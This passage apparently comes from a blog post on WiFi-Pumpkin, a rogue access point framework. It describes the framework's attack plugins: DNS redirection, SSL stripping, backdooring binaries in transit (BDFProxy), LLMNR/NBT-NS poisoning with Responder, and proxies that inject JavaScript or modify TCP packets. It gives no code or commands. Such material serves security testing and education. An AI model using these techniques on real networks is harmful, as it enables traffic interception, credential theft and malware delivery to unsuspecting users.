Dns2proxy This tools offer a different features for post-explotation once you change the DNS server to a Victim.
Sstrip2 Sslstrip is a MITM tool that implements Moxie Marlinspike’s SSL stripping attacks based version fork @LeonardoNve/@xtr4nge.
Sergio_proxy Sergio Proxy (a Super Effective Recorder of Gathered Inputs and Outputs) is an HTTP proxy that was written in Python for the Twisted framework.
BDFProxy Patch Binaries via MITM: BackdoorFactory + mitmProxy, bdfproxy-ng is a fork and review of the original BDFProxy @secretsquirrel.
Responder an LLMNR, NBT-NS and MDNS poisoner. Author: Laurent Gaffie

Transparent Proxy

Transparent proxies(mitmproxy) that you can use to intercept and manipulate HTTP traffic modifying requests and responses, that allow injecting javascript into the targets visited. You can easily implement a module to inject data into pages creating a python file in directory “plugins/extension/” automatically will be listed on the Pumpkin-Proxy tab.

Also Read Fern Wifi Cracker For Wireless Security

TCP-Proxy Server

A proxy that you can place between in a TCP stream. It filters the request and response streams with (scapy module) and actively modify packets of a TCP protocol that gets intercepted by WiFi-Pumpkin. this plugin uses modules to view or modify the intercepted data that possibly the easiest implementation of a module, just add your custom module on “plugins/analyzers/” automatically will be listed on the TCP-Proxy tab.

Tool Credits: